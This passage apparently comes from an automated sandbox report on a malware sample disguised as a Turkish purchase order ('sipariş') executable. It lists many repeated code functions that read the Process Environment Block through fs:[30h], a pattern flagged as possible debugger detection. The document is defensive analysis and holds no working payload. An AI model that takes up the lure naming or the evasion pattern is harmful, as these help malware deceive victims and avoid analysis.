            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E645D mov eax, dword ptr fs:[00000030h]3_2_018E645D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191A470 mov eax, dword ptr fs:[00000030h]3_2_0191A470
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191A470 mov eax, dword ptr fs:[00000030h]3_2_0191A470
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191A470 mov eax, dword ptr fs:[00000030h]3_2_0191A470
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197C460 mov ecx, dword ptr fs:[00000030h]3_2_0197C460
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199678E mov eax, dword ptr fs:[00000030h]3_2_0199678E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F07AF mov eax, dword ptr fs:[00000030h]3_2_018F07AF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A47A0 mov eax, dword ptr fs:[00000030h]3_2_019A47A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FC7C0 mov eax, dword ptr fs:[00000030h]3_2_018FC7C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019707C3 mov eax, dword ptr fs:[00000030h]3_2_019707C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F47FB mov eax, dword ptr fs:[00000030h]3_2_018F47FB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F47FB mov eax, dword ptr fs:[00000030h]3_2_018F47FB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197E7E1 mov eax, dword ptr fs:[00000030h]3_2_0197E7E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019127ED mov eax, dword ptr fs:[00000030h]3_2_019127ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019127ED mov eax, dword ptr fs:[00000030h]3_2_019127ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019127ED mov eax, dword ptr fs:[00000030h]3_2_019127ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01920710 mov eax, dword ptr fs:[00000030h]3_2_01920710
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C700 mov eax, dword ptr fs:[00000030h]3_2_0192C700
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0710 mov eax, dword ptr fs:[00000030h]3_2_018F0710
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196C730 mov eax, dword ptr fs:[00000030h]3_2_0196C730
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192273C mov eax, dword ptr fs:[00000030h]3_2_0192273C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192273C mov ecx, dword ptr fs:[00000030h]3_2_0192273C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192273C mov eax, dword ptr fs:[00000030h]3_2_0192273C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C720 mov eax, dword ptr fs:[00000030h]3_2_0192C720
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C720 mov eax, dword ptr fs:[00000030h]3_2_0192C720
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01974755 mov eax, dword ptr fs:[00000030h]3_2_01974755
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932750 mov eax, dword ptr fs:[00000030h]3_2_01932750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932750 mov eax, dword ptr fs:[00000030h]3_2_01932750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197E75D mov eax, dword ptr fs:[00000030h]3_2_0197E75D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192674D mov esi, dword ptr fs:[00000030h]3_2_0192674D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192674D mov eax, dword ptr fs:[00000030h]3_2_0192674D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192674D mov eax, dword ptr fs:[00000030h]3_2_0192674D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0750 mov eax, dword ptr fs:[00000030h]3_2_018F0750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900770 mov eax, dword ptr fs:[00000030h]3_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8770 mov eax, dword ptr fs:[00000030h]3_2_018F8770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4690 mov eax, dword ptr fs:[00000030h]3_2_018F4690
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4690 mov eax, dword ptr fs:[00000030h]3_2_018F4690
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019266B0 mov eax, dword ptr fs:[00000030h]3_2_019266B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C6A6 mov eax, dword ptr fs:[00000030h]3_2_0192C6A6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0192A6C7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A6C7 mov eax, dword ptr fs:[00000030h]3_2_0192A6C7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h]3_2_0196E6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h]3_2_0196E6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h]3_2_0196E6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h]3_2_0196E6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019706F1 mov eax, dword ptr fs:[00000030h]3_2_019706F1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019706F1 mov eax, dword ptr fs:[00000030h]3_2_019706F1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01932619 mov eax, dword ptr fs:[00000030h]3_2_01932619
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190260B mov eax, dword ptr fs:[00000030h]3_2_0190260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190260B mov eax, dword ptr fs:[00000030h]3_2_0190260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190260B mov eax, dword ptr fs:[00000030h]3_2_0190260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190260B mov eax, dword ptr fs:[00000030h]3_2_0190260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190260B mov eax, dword ptr fs:[00000030h]3_2_0190260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190260B mov eax, dword ptr fs:[00000030h]3_2_0190260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190260B mov eax, dword ptr fs:[00000030h]3_2_0190260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E609 mov eax, dword ptr fs:[00000030h]3_2_0196E609
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F262C mov eax, dword ptr fs:[00000030h]3_2_018F262C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01926620 mov eax, dword ptr fs:[00000030h]3_2_01926620
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928620 mov eax, dword ptr fs:[00000030h]3_2_01928620
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E627 mov eax, dword ptr fs:[00000030h]3_2_0190E627
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190C640 mov eax, dword ptr fs:[00000030h]3_2_0190C640
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01922674 mov eax, dword ptr fs:[00000030h]3_2_01922674
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A660 mov eax, dword ptr fs:[00000030h]3_2_0192A660
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A660 mov eax, dword ptr fs:[00000030h]3_2_0192A660
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B866E mov eax, dword ptr fs:[00000030h]3_2_019B866E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B866E mov eax, dword ptr fs:[00000030h]3_2_019B866E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F09AD mov eax, dword ptr fs:[00000030h]3_2_018F09AD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F09AD mov eax, dword ptr fs:[00000030h]3_2_018F09AD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019789B3 mov esi, dword ptr fs:[00000030h]3_2_019789B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019789B3 mov eax, dword ptr fs:[00000030h]3_2_019789B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019789B3 mov eax, dword ptr fs:[00000030h]3_2_019789B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A0 mov eax, dword ptr fs:[00000030h]3_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019249D0 mov eax, dword ptr fs:[00000030h]3_2_019249D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BA9D3 mov eax, dword ptr fs:[00000030h]3_2_019BA9D3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019869C0 mov eax, dword ptr fs:[00000030h]3_2_019869C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h]3_2_018FA9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h]3_2_018FA9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h]3_2_018FA9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h]3_2_018FA9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h]3_2_018FA9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA9D0 mov eax, dword ptr fs:[00000030h]3_2_018FA9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019229F9 mov eax, dword ptr fs:[00000030h]3_2_019229F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019229F9 mov eax, dword ptr fs:[00000030h]3_2_019229F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197E9E0 mov eax, dword ptr fs:[00000030h]3_2_0197E9E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197C912 mov eax, dword ptr fs:[00000030h]3_2_0197C912
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8918 mov eax, dword ptr fs:[00000030h]3_2_018E8918
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8918 mov eax, dword ptr fs:[00000030h]3_2_018E8918
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E908 mov eax, dword ptr fs:[00000030h]3_2_0196E908
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E908 mov eax, dword ptr fs:[00000030h]3_2_0196E908
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0198892B mov eax, dword ptr fs:[00000030h]3_2_0198892B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197892A mov eax, dword ptr fs:[00000030h]3_2_0197892A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01970946 mov eax, dword ptr fs:[00000030h]3_2_01970946
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4940 mov eax, dword ptr fs:[00000030h]3_2_019C4940
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01994978 mov eax, dword ptr fs:[00000030h]3_2_01994978
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01994978 mov eax, dword ptr fs:[00000030h]3_2_01994978
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197C97C mov eax, dword ptr fs:[00000030h]3_2_0197C97C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01916962 mov eax, dword ptr fs:[00000030h]3_2_01916962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01916962 mov eax, dword ptr fs:[00000030h]3_2_01916962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01916962 mov eax, dword ptr fs:[00000030h]3_2_01916962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193096E mov eax, dword ptr fs:[00000030h]3_2_0193096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193096E mov edx, dword ptr fs:[00000030h]3_2_0193096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193096E mov eax, dword ptr fs:[00000030h]3_2_0193096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0887 mov eax, dword ptr fs:[00000030h]3_2_018F0887
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197C89D mov eax, dword ptr fs:[00000030h]3_2_0197C89D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E8C0 mov eax, dword ptr fs:[00000030h]3_2_0191E8C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C08C0 mov eax, dword ptr fs:[00000030h]3_2_019C08C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C8F9 mov eax, dword ptr fs:[00000030h]3_2_0192C8F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C8F9 mov eax, dword ptr fs:[00000030h]3_2_0192C8F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BA8E4 mov eax, dword ptr fs:[00000030h]3_2_019BA8E4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197C810 mov eax, dword ptr fs:[00000030h]3_2_0197C810
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A830 mov eax, dword ptr fs:[00000030h]3_2_0192A830
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199483A mov eax, dword ptr fs:[00000030h]3_2_0199483A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199483A mov eax, dword ptr fs:[00000030h]3_2_0199483A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912835 mov eax, dword ptr fs:[00000030h]3_2_01912835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912835 mov eax, dword ptr fs:[00000030h]3_2_01912835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912835 mov eax, dword ptr fs:[00000030h]3_2_01912835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912835 mov ecx, dword ptr fs:[00000030h]3_2_01912835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912835 mov eax, dword ptr fs:[00000030h]3_2_01912835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912835 mov eax, dword ptr fs:[00000030h]3_2_01912835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01920854 mov eax, dword ptr fs:[00000030h]3_2_01920854
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01902840 mov ecx, dword ptr fs:[00000030h]3_2_01902840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4859 mov eax, dword ptr fs:[00000030h]3_2_018F4859
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4859 mov eax, dword ptr fs:[00000030h]3_2_018F4859
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197E872 mov eax, dword ptr fs:[00000030h]3_2_0197E872
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197E872 mov eax, dword ptr fs:[00000030h]3_2_0197E872
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986870 mov eax, dword ptr fs:[00000030h]3_2_01986870
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986870 mov eax, dword ptr fs:[00000030h]3_2_01986870
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A4BB0 mov eax, dword ptr fs:[00000030h]3_2_019A4BB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A4BB0 mov eax, dword ptr fs:[00000030h]3_2_019A4BB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900BBE mov eax, dword ptr fs:[00000030h]3_2_01900BBE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900BBE mov eax, dword ptr fs:[00000030h]3_2_01900BBE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0BCD mov eax, dword ptr fs:[00000030h]3_2_018F0BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0BCD mov eax, dword ptr fs:[00000030h]3_2_018F0BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0BCD mov eax, dword ptr fs:[00000030h]3_2_018F0BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199EBD0 mov eax, dword ptr fs:[00000030h]3_2_0199EBD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01910BCB mov eax, dword ptr fs:[00000030h]3_2_01910BCB
